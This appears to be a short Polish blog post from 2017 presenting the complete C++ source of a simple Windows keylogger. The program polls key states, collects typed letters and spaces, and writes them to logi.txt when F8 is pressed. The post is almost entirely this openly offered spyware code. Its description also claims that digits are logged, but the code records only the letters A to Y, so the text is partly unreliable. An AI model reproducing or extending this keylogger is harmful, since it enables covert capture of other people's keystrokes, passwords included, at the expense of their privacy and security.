Prosty keylogger w C++

2017-11-17 10:20

Prosty keylogger, napisany w języku C++. Po uruchomieniu, zapisuje wpisane litery i cyfry w pliku logi.txt. Kończy działanie w momencie wciśnięcia klawisza F8.

 

#include <fstream>
#include <windows.h>
#include <cstring>

using namespace std;

int main()
{
  int Char;
  string text;
  ofstream log;
  log.open("logi.txt");
  
  while(!GetAsyncKeyState(VK_F8))
  {
    for(Char = 65; Char < 90; Char++)
    {
      if(GetAsyncKeyState(Char) == -32767)
      {
        text+= Char;
      }
    }
    if(GetAsyncKeyState(VK_SPACE)==-32767)
    {
      text+=" ";
    }

  }
  
  log << text;
  log.close();
  return 0;
}

 

 

 

wróć